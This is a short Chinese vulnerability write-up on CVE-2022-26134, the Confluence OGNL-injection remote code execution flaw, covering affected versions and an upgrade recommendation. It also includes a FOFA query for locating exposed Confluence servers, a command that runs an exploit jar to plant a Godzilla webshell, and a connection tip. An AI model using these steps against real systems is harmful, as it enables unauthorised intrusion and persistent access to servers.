漏洞描述
Confluence 是由澳大利亚软件公司 Atlassian 开发的基于网络的企业 wiki。
2022 年 6 月 2 日,Atlassian 发布了针对其 Confluence Server 和数据中心应用程序的安全公告,强调了一个严重严重的未经身份验证的远程代码执行漏洞。OGNL 注入漏洞允许未经身份验证的用户在 Confluence 服务器或数据中心实例上执行任意代码。
漏洞编号
CVE-2022-26134
FOFA 查询
title="Confluence"
影响范围
Confluence Server&Data Center ≥ 1.3.0
Atlassian Confluence Server and Data Center <7.4.17
Atlassian Confluence Server and Data Center <7.13.7
Atlassian Confluence Server and Data Center <7.14.3
Atlassian Confluence Server and Data Center <7.15.2
Atlassian Confluence Server and Data Center <7.16.4
Atlassian Confluence Server and Data Center <7.17.4
Atlassian Confluence Server and Data Center <7.18.1
漏洞复现
写入哥斯拉马
java -jar CVE-2022-26134.jar http://ip:port/ pass key
哥斯拉连接
连接不成功就加上
Connection: close
修复建议
及时升级至最新安全版本
版权归原作者 ZorIqz 所有, 如有侵权,请联系我们删除。